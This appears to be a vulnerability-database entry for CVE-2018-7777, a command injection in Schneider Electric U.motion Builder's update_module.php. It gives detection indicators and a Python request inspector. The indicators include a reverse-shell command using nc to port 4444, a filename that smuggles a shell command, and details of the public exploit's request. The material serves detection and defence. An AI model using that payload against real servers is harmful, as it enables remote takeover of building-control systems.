cbcvebase.
CVE-2018-7777
published 2018-07-03

Priority: P2 (72, high)
CVSS 3.0: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Exploit: public exploit available
EPSS: 31.80% (98.1th percentile)
The vulnerability is due to insufficient handling of update_file request parameter on update_module.php in Schneider Electric U.motion Builder software versions prior to v1.3.4. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target server.

Affected (2 ranges)

Vendor                 Product            Version range   Fixed in
schneider-electric     u.motion_builder   < 1.3.4         1.3.4
schneider_electric_se  u.motion           -               -

Detection & IOCs (extracted from sources)

url:      http://{target}:{port}/umotion/modules/system/update_module.php
path:     /umotion/modules/system/update_module.php
cookie:   PHPSESSID={sessid}; loginSeed={login_seed}
filename: my;{command};file.tar.gz
command:  nc -e $SHELL {src_ip} 4444
port:     4444
bytes:    \x1f\x8b
  • Detect POST requests to /umotion/modules/system/update_module.php where the multipart filename field (update_file) contains semicolons, indicating command injection via the filename parameter.
  • Look for the multipart boundary string '----------lImIt_of_THE_fIle_eW_$' in HTTP request bodies, which is a static indicator used by the public exploit.
  • Monitor for the X-Requested-With: XMLHttpRequest header combined with a POST to update_module.php and a multipart/form-data body containing 'choose_update_mode=MANUAL' and 'step=2'.
  • Alert on HTTP requests to /umotion/modules/system/externalframe.php used as the Referer header alongside exploitation of update_module.php.
  • Detect reverse shell attempts originating from the U.Motion server process on port 4444, consistent with 'nc -e $SHELL' payload delivery.
  • The exploit regex pattern for cookie extraction is 'PHPSESSID=(.{26});.*loginSeed=(.{32})' — monitor for both cookies being set simultaneously as a login indicator before exploitation.
  • The vulnerability requires authentication; the attacker must first obtain valid credentials and log in via user_login.php before exploiting update_module.php.
  • The exploit targets versions prior to v1.3.4; the exploit title references 1.3.4, but the NVD description clarifies that the vulnerable range is versions *prior to* v1.3.4.
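As an added example (not code from the page's sources or from the vendor), a Python inspector that applies the request-level indicators above to one raw HTTP request: endpoint, static boundary, Referer, the manual-update form fields, and shell metacharacters in the update_file filename. The sample request is constructed from the placeholders listed above; the host name is an assumption.

```python
import re

# Constructed sample request assembled from the IOC placeholders above (not captured
# traffic); the host name is an assumption and "{command}" is kept as a placeholder.
B = "----------lImIt_of_THE_fIle_eW_$"
SAMPLE_REQUEST = (
    "POST /umotion/modules/system/update_module.php HTTP/1.1\r\n"
    "Host: umotion.example\r\nX-Requested-With: XMLHttpRequest\r\n"
    "Referer: http://umotion.example/umotion/modules/system/externalframe.php\r\n"
    f"Content-Type: multipart/form-data; boundary={B}\r\n\r\n"
    f'--{B}\r\nContent-Disposition: form-data; name="choose_update_mode"\r\n\r\nMANUAL\r\n'
    f'--{B}\r\nContent-Disposition: form-data; name="step"\r\n\r\n2\r\n'
    f'--{B}\r\nContent-Disposition: form-data; name="update_file"; '
    'filename="my;{command};file.tar.gz"\r\nContent-Type: application/gzip\r\n\r\n'
    f"\x1f\x8bDATA\r\n--{B}--\r\n"
)
SHELL_META = re.compile(r"[;|&`$]")          # metacharacters that have no place in a filename

def inspect_request(raw: str) -> list[str]:
    """Return the indicators matched by one raw HTTP request (empty list = nothing flagged)."""
    findings: list[str] = []
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target = request_line.split(" ")[:2]
    headers = {k.lower(): v for k, v in (h.split(": ", 1) for h in header_lines if ": " in h)}
    if method != "POST" or not target.endswith("/umotion/modules/system/update_module.php"):
        return findings                       # only the vulnerable endpoint is in scope
    m = re.search(r"boundary=(.+)", headers.get("content-type", ""))
    if not m:
        return findings                       # not a multipart upload
    boundary = m.group(1)
    if boundary == B:
        findings.append("static multipart boundary used by the public exploit")
    if headers.get("referer", "").endswith("/umotion/modules/system/externalframe.php"):
        findings.append("Referer is externalframe.php")
    fields, filename = {}, None
    for part in body.split(f"--{boundary}"):  # preamble and closing "--" carry no name
        part_head, _, part_body = part.partition("\r\n\r\n")
        name = re.search(r'(?<!file)name="([^"]*)"', part_head)
        fn = re.search(r'filename="([^"]*)"', part_head)
        if name and fn and name.group(1) == "update_file":
            filename = fn.group(1)
        elif name:
            fields[name.group(1)] = part_body.strip("\r\n")
    if filename is not None and SHELL_META.search(filename):
        findings.append(f"shell metacharacter in update_file filename {filename!r}")
    if (headers.get("x-requested-with") == "XMLHttpRequest"
            and fields.get("choose_update_mode") == "MANUAL" and fields.get("step") == "2"):
        findings.append("manual update step 2 submitted via XMLHttpRequest")
    return findings
```

A legitimate manual update through the UI will still match the form-field and Referer indicators, so treat the filename and static-boundary findings as the high-confidence ones and the rest as context.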

CVSS provenance

nvd  v3.0  8.8  HIGH    CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd  v2.0  6.5  MEDIUM  AV:N/AC:L/Au:S/C:P/I:P/A:P